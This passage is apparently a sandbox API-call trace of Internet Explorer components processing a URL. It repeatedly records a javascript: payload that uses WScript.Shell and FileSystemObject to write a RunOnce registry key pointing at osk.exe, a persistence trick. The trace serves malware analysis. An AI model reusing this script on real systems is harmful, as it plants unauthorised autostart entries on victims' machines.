ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f168, pcbSecurityId=0x33f164*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f168*=0x0, pcbSecurityId=0x33f164*=0x200) returned 0x800c0011 [0066.665] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.665] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.665] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a8618 [0066.665] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x33f38c, dwReserved=0x0 | out: ppIInternetSession=0x33f38c*=0x790188) returned 0x0 [0066.665] IInternetSession:RegisterNameSpace (This=0x790188, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.666] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.666] IInternetSession:RegisterNameSpace (This=0x790188, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.666] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.666] StrCmpICW (pszStr1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.666] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2fc | out: ppvObject=0x33f2fc*=0x78ca14) returned 0x0 [0066.666] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.666] IUnknown:AddRef (This=0x78ca14) returned 0xa [0066.666] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12c) returned 0x7a8728 [0066.667] IUnknown:AddRef (This=0x78ca14) returned 0xb [0066.667] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2c0 | out: ppvObject=0x33f2c0*=0x78ca14) returned 0x0 [0066.667] IUnknown:Release (This=0x78ca14) returned 0xb [0066.667] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.667] IUnknown:Release (This=0x78ca14) returned 0xb [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x3c) returned 0x774448 [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x7a8860 [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77d9d0 [0066.667] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f344 | out: pdwScheme=0x33f344*=0xf) returned 0x0 [0066.668] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f34c | out: ppvObject=0x33f34c*=0x78ca14) returned 0x0 [0066.668] IUnknown:Release (This=0x78ca14) returned 0xb [0066.668] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.668] IUnknown:Release (This=0x78ca14) returned 0xb [0066.668] IUri:IsEqual (in: This=0x78c78c, pUri=0x78ca14, pfEqual=0x33f38c | out: pfEqual=0x33f38c*=1) returned 0x0 [0066.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3288 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7a1fd8 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a8d00 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77da40 [0066.668] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12c) returned 0x7a8d68 [0066.668] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.668] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2e0 | out: ppvObject=0x33f2e0*=0x78ca14) returned 0x0 [0066.669] IUnknown:Release (This=0x78ca14) returned 0xc [0066.669] IUnknown:AddRef (This=0x78ca14) returned 0xd [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a32e0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x68) returned 0x7a8ea0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x108) returned 0x7a27a0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bbb0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xcc) returned 0x78ce40 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78b940 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1b0) returned 0x7a28b0 [0066.669] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efe4 | out: ppvObject=0x33efe4*=0x78ca14) returned 0x0 [0066.669] IUnknown:Release (This=0x78ca14) returned 0xd [0066.669] IUnknown:AddRef (This=0x78ca14) returned 0xe [0066.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.669] IUnknown:AddRef (This=0x78ca14) returned 0xf [0066.670] IUnknown:AddRef (This=0x78ca14) returned 0x10 [0066.670] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efd8 | out: ppvObject=0x33efd8*=0x78ca14) returned 0x0 [0066.670] IUnknown:Release (This=0x78ca14) returned 0x10 [0066.670] IUnknown:AddRef (This=0x78ca14) returned 0x11 [0066.670] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x7a29b8 | out: pdwScheme=0x7a29b8*=0xf) returned 0x0 [0066.670] IMoniker:IsSystemMoniker (in: This=0x78af40, pdwMksys=0x33f040 | out: pdwMksys=0x33f040*=0x6) returned 0x0 [0066.743] IUri:GetSchemeName (in: This=0x78ca14, pbstrSchemeName=0x33ef98 | out: pbstrSchemeName=0x33ef98*="javascript") returned 0x0 [0066.743] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.743] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33efe4 | out: pdwScheme=0x33efe4*=0xf) returned 0x0 [0066.743] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efa4 | out: ppvObject=0x33efa4*=0x78ca14) returned 0x0 [0066.743] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.743] IUnknown:AddRef (This=0x78ca14) returned 0x12 [0066.743] CoInternetQueryInfo (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x33efd4, cbBuffer=0x4, pcbBuffer=0x33efcc, dwReserved=0x0 | out: pvBuffer=0x33efd4*, pcbBuffer=0x33efcc*=0x4) returned 0x0 [0066.744] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ee5c | out: ppv=0x33ee5c*=0x75028d20) returned 0x0 [0066.744] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x75028d2c) returned 0x0 [0066.744] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.750] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x33cf08, cchResult=0x1000, pcchResult=0x33cf04, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33cf04) returned 0x0 [0066.750] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33cd98 | out: ppv=0x33cd98*=0x75028d20) returned 0x0 [0066.751] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ce84 | out: ppvObject=0x33ce84*=0x75028d2c) returned 0x0 [0066.751] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.751] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x33cf08, cchResult=0x1000, pcchResult=0x33cf04, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33cf04*=0x0) returned 0x800c0011 [0066.751] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.751] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33ced4 | out: ppu=0x33ced4) returned 0x0 [0066.842] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.842] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.842] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efe4 | out: ppvObject=0x33efe4*=0x78ca14) returned 0x0 [0066.843] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.843] IUnknown:AddRef (This=0x78ca14) returned 0x12 [0066.843] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3338 [0066.843] GetCurrentThreadId () returned 0x544 [0066.843] CreateBindCtx (in: reserved=0x0, ppbc=0x33f028 | out: ppbc=0x33f028*=0x7a08d0) returned 0x0 [0066.844] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc) returned 0x79dbd8 [0066.844] IUnknown:AddRef (This=0x7a08d0) returned 0x2 [0066.844] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790a18 [0066.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ef0c | out: phkResult=0x33ef0c*=0x1c8) returned 0x0 [0066.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ef10 | out: phkResult=0x33ef10*=0x14c) returned 0x0 [0066.844] RegOpenKeyExW (in: hKey=0x14c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33eecc | out: phkResult=0x33eecc*=0x0) returned 0x2 [0066.845] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33eecc | out: phkResult=0x33eecc*=0x1cc) returned 0x0 [0066.845] SHRegGetValueW () returned 0x2 [0066.845] SHRegGetValueW () returned 0x2 [0066.845] RegCloseKey (hKey=0x1cc) returned 0x0 [0066.845] RegCloseKey (hKey=0x0) returned 0x6 [0066.845] RegCloseKey (hKey=0x0) returned 0x6 [0066.845] RegCloseKey (hKey=0x1c8) returned 0x0 [0066.845] RegCloseKey (hKey=0x14c) returned 0x0 [0066.846] RegisterBindStatusCallback (in: pBC=0x7a08d0, pBSCb=0x7a28c0, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.846] IUnknown:AddRef (This=0x7a28c0) returned 0x4 [0066.846] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33ef74 | out: ppvObject=0x33ef74*=0x7a28c4) returned 0x0 [0066.846] IMoniker:RemoteBindToStorage (in: This=0x78af40, pbc=0x7a08d0, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x33efc0 | out: ppvObj=0x33efc0*=0x0) returned 0x401e8 [0066.847] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eaf8 | out: ppv=0x33eaf8*=0x75028d20) returned 0x0 [0066.848] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ebe4 | out: ppvObject=0x33ebe4*=0x75028d2c) returned 0x0 [0066.848] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.848] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x7a9710, cchResult=0x824, pcchResult=0x33eef8, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33eef8*=0x0) returned 0x800c0011 [0066.848] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.848] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x33ee88 | out: ppvObject=0x33ee88*=0x7a28c0) returned 0x0 [0066.848] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x7a28c0, grfBINDF=0x7a2f6c, pbindinfo=0x7a301c, pstgmed=0x7a2f70, grfBINDF2=0x33eed4, pdwReserved=0x80004005 | out: grfBINDF=0x7a2f6c*=0x83, pbindinfo=0x7a301c, pstgmed=0x7a2f70, grfBINDF2=0x33eed4*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33eda8 | out: phkResult=0x33eda8*=0x14c) returned 0x0 [0066.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33edac | out: phkResult=0x33edac*=0x1c8) returned 0x0 [0066.849] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33ed68 | out: phkResult=0x33ed68*=0x0) returned 0x2 [0066.849] RegOpenKeyExW (in: hKey=0x14c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x33ed68 | out: phkResult=0x33ed68*=0x0) returned 0x2 [0066.849] RegCloseKey (hKey=0x0) returned 0x6 [0066.849] RegCloseKey (hKey=0x0) returned 0x6 [0066.849] RegCloseKey (hKey=0x14c) returned 0x0 [0066.849] RegCloseKey (hKey=0x1c8) returned 0x0 [0066.850] IUnknown:Release (This=0x7a28c0) returned 0x5 [0066.850] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee50 | out: ppvObject=0x33ee50*=0x0) returned 0x80004002 [0066.850] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee50 | out: ppvObject=0x33ee50*=0x0) returned 0x80004002 [0066.850] GetCurrentThreadId () returned 0x544 [0066.850] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ed9c | out: ppv=0x33ed9c*=0x75028d20) returned 0x0 [0066.850] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.852] IBindStatusCallback:OnStartBinding (This=0x7a28c0, dwReserved=0xff, pib=0x7a2f28) returned 0x0 [0066.852] IUnknown:AddRef (This=0x7a2f28) returned 0x2 [0066.852] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.852] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ed60 | out: ppvObject=0x33ed60*=0x0) returned 0x80004002 [0066.852] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ed60 | out: ppvObject=0x33ed60*=0x0) returned 0x80004002 [0066.852] GetCurrentThreadId () returned 0x544 [0066.853] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ed70 | out: ppv=0x33ed70*=0x75028d20) returned 0x0 [0066.853] IClassFactory:CreateInstance (in: This=0x75028d20, pUnkOuter=0x7a9718, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7a973c | out: ppvObject=0x7a973c*=0x7abec8) returned 0x0 [0066.884] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x98) returned 0x7abec8 [0066.884] IUnknown_QueryService (in: punk=0x7a9718, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x33eda0 | out: ppvOut=0x33eda0*=0x79638c) returned 0x0 [0066.884] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33ec48 | out: ppvObject=0x33ec48*=0x0) returned 0x80004002 [0066.884] IServiceProvider:QueryService (in: This=0x7a28c4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x33ec48 | out: ppvObject=0x33ec48*=0x79638c) returned 0x0 [0066.884] GetCurrentThreadId () returned 0x544 [0066.937] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x7a97a0 | out: ppvObject=0x7a97a0*=0x7abedc) returned 0x0 [0066.937] IUnknown:AddRef (This=0x7a9718) returned 0x7 [0066.937] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.937] IUnknown:Release (This=0x7abedc) returned 0x6 [0066.937] IUnknown:Release (This=0x7a9718) returned 0x6 [0066.937] IUnknown:AddRef (This=0x7abedc) returned 0x7 [0066.937] IUnknown:AddRef (This=0x7a9718) returned 0x7 [0066.937] IUnknown:Release (This=0x7abedc) returned 0x6 [0066.937] IUnknown:Release (This=0x7a9718) returned 0x6 [0066.937] IUnknown:QueryInterface (in: This=0x7abedc, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee4c | out: ppvObject=0x33ee4c*=0x7a9728) returned 0x0 [0066.937] IUnknown:QueryInterface (in: This=0x7a9718, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ee4c | out: ppvObject=0x33ee4c*=0x7a9728) returned 0x0 [0066.938] IUnknown:QueryInterface (in: This=0x7abec8, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x33ee58 | out: ppvObject=0x33ee58*=0x0) returned 0x80004002 [0067.663] IUnknown:AddRef (This=0x7a9718) returned 0x8 [0067.663] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x33ce18, cchResult=0x1000, pcchResult=0x33ce00, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ce00) returned 0x0 [0067.664] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33cc94 | out: ppv=0x33cc94*=0x75028d20) returned 0x0 [0067.664] IUnknown:QueryInterface (in: 